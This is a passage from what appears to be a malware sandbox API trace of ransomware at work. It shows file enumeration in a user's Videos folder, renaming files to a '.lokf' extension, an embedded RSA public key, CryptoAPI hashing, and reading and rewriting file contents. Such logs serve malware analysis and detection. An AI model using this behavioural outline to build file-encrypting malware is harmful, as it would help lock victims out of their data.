(HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.298] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-UhIDPZCm6I2UoJXWw.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-uhidpzcm6i2uojxww.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-UhIDPZCm6I2UoJXWw.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-uhidpzcm6i2uojxww.mkv.lokf")) returned 1 [0059.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.298] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.299] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x27e7be0, ftLastAccessTime.dwHighDateTime=0x1d4cbe5, ftLastWriteTime.dwLowDateTime=0x27e7be0, ftLastWriteTime.dwHighDateTime=0x1d4cbe5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27nF", cAlternateFileName="")) returned 1 [0059.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0059.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.299] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe043560, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x8b63bb70, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0x8b63bb70, ftLastWriteTime.dwHighDateTime=0x1d4ccab, nFileSizeHigh=0x0, nFileSizeLow=0x43d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MMWzVzn.mp4", cAlternateFileName="")) returned 1 [0059.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.299] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8MMWzVzn.mp4") returned=".mp4" [0059.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8MMWzVzn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8mmwzvzn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.300] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=17360) returned 1 [0059.300] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.303] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x43aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.303] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.303] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.303] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.304] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.304] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x43d0, lpOverlapped=0x0) returned 1 [0059.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.304] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.305] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.305] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.305] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.305] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.305] GetLastError () returned 0x0 [0059.305] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.305] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.305] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.305] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.305] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x43d0) returned 0x9c83710 [0059.305] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c836a0 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b580 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87b00 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b598 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b5c8 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b5e0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.306] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5e0 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5e0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b5c8 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5e0 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.306] GetCurrentThreadId () returned 0x9e0 [0059.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7e588 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.307] GetCurrentThreadId () returned 0x9e0 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b5c8 [0059.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5e0 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b5b0 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5f8 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5c8 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5f8 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5e0 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5b0 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b598 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87b00 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.310] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x43cb, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x43cb, lpOverlapped=0x0) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.310] SetFilePointerEx (in: 